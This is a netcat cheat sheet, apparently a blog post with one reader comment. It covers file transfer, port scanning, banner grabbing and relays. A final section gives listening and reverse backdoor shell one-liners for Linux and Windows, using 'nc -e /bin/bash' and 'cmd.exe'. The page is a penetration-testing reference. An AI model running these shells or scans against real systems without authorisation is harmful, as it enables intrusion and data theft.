- Download: http://joncraton.org/blog/netcat-for-windows
- Reference: http://en.wikipedia.org/wiki/Netcat
- Reference: http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
[Fundamentals]
1. Fundamental Netcat Client:
# nc [TargetIPaddr] [TargetPort]
Connect to an arbitrary port [TargetPort] at IP Address [TargetIPaddr]
2. Fundamental Netcat Listener:
# nc -l -p [LocalPort]
Create a Netcat listener on arbitrary local port [LocalPort]
# nc -lvk -p [LocalPort]
If you want to force Netcat to stay listening after one connection you can use the -k flag. Using the -v (verbose) flag will make Netcat output who is connecting (over stderr), this is good to know when using the -k flag because it is possible that there are different computers connecting to you.
Both the client and listener take input from STDIN, and print responses to STDOUT.
[File Transfer]
1. Push a file
(1) Connect & Upload (Being a Netcat Client):
# nc [TargerIPaddr] [TargetPort] < [InFile]
Push the file [InFile] to IP address [TargetIPaddr] on port [TargetPort]
(2) Listen & Upload (Being a Netcat Listener):
# nc -l -p [LocalPort] < [InFile]
Listen on [LocalPort], prepare to push [InFile]
2. Pull a file
(1) Listen & Download (Being a Netcat Listener):
# nc -l -w3 -p [LocalPort] > [OutFile]
Pull a file being pushed to you on local port [LocalPort] and store it in [OutFile], closing the connection after 3 seconds
(2) Connect & Download (Being a Netcat Client):
# nc -w3 [TargerIPaddr] [TargetPort] > [OutFile]
Connect to IP address [TargetIPaddr] on port [TargetPort] and retrieve [OutFile] closing the connection after 3 seconds
Adjust the wait time from 3 to any value of seconds that is ample tome to transfer the specified file.
[TCP Port Scanner]
1. Port scan an IP Adddress:
# nc -v -n -z -w1 [TargetIPaddr] [StartPort] - [EndPort]
Attempt to connect to each port in a range from [StartPort] to [EndPort] on IP Address [TargetIPaddr] running verbosely (-v on Linux, -vv on Windows), not resolving names (-n),without sending any data (-z), and waiting no more than 1 second for a connection to occur (-w1)
The randomize ports (-r) switch can be used to randomly choose port numbers in the range to be queried, instead of the default behavior of counting down from the last port to the first.
[TCP Banner Grabber]
1. Grab the banner of any TCP service running on an IP Address from Linux:
# echo "" | nc -v -n -w1 [TargetIPaddr] [StartPort] - [EndPort]
Attempt to connect to each port in a range from [StartPort] to [EndPort] on IP Address [TargetIPaddr] running verbosely (-v on Linux, -vv on Windows), not resolving names (-n), and waiting no more than 1 second for a connection to occur (-w1). Then send a blank string to the open port and print out any banner received in response.
Add -p [Port] to specify a source port. The randomize ports (-r) switch can be used to randomly choose port numbers in the range to be queried, instead of the default behavior of counting down from the last port to the first.
[Netcat Relays on Winodws]
To start, enter a temporary directory where we will be creating a series of .bat files:
C:\> cd C:\temp
1. Relay from a Netcat Listener to a Netcat Client:
C:\temp> echo nc [TargetIPaddr] [TargetPort] > relay.bat
C:\temp> nc -l -p [LocalPort] -e relay.bat
Create a relay that will route packets from the local port [LocalPort] to a Netcat Client connected to [TargetIPaddr] on port [TargetPort]
2. Relay from Netcat Client to Netcat Client:
C:\temp> echo nc [TargetIPaddr] [TargetPort] > relay.bat
C:\temp> nc [SourceIPaddr] [SourcePort] -e relay.bat
Create a relay that will route packets from the connection to [SourceIPaddr] on port [SourcePort] to a Netcat Client connected to [TargetIPaddr] on port [TargetPort]
3. Relay from Netcat Listener to Netcat Listener:
C:\temp> echo nc -l -p [LocalPort2] > relay.bat
C:\temp> nc -l -p [LocalPort1] -e relay.bat
Create a relay that will route packets from any connection connected to [LocalPort1] to any connection connected to [LocalPort2]
[Netcat Relays on Linux]
To start, enter a temporary directory and create a FIFO called backpipe:
# cd /tmp
# mknod backpipe p
mknod - make block or character special files
mknod [OPTION]... NAME TYPE [MAJOR MINOR]
TYPE p : create a FIFO
1. Relay from a Netcat Listener on a Netcat Client:
# nc -l -p [LocalPort] 0<backpipe | nc [TargetIPaddr] [TargetPort] | tee backpipe
0: STDIN, 1:STDOUT, 2:STDERR
tee - read from standard input and write to standard output and files
tee [OPTION]... [FILE]...
2. Relay from Netcat Client to Netcat Client:
# nc [SourceIPaddr] [SourcePort] 0<backpipe | nc [TargetIPaddr] [TargetPort] | tee backpipe
Create a relay that will route packets from the connection to [SourceIPaddr] on port [SourcePort] to a Netcat Client connected to [TargetIPaddr] on port [targetPort]
3. Relay from Netcat Listener to Netcat Listener:
# nc -l -p [LocalPort1] 0<backpipe | nc -l -p [LocaalPort2] | tee backpipe
Create a relay that will route packets from any connection connected to [LocalPort1] to any connection connected to [LocalPort2]
[Backdoor Shells]
1. Listening backdoor shell on Linux:
# nc -l -p [LocalPort] -e /bin/bash
2. Listening backdoor shell on Windows:
C:\> nc -l -p [LocalPort] -e cmd.exe
Create a shell on local port [LocalPort] that can then be connected to using a fundamental client
3. Reverse backdoor shell on Linux:
# nc [YourIPaddr] [YourPort] -e /bin/bash
4. Reverse backdoor shell on Windows:
C:\> nc [YourIPaddr] [YourPort] -e cmd.exe
Create a reverse shell that will attempt to connect to [YourIPaddr] on port [YourPort]. This shell can then be captured using a fundamental listener.
Keep up the educational work man ! I'm going to visit this blog more often.
ReplyDelete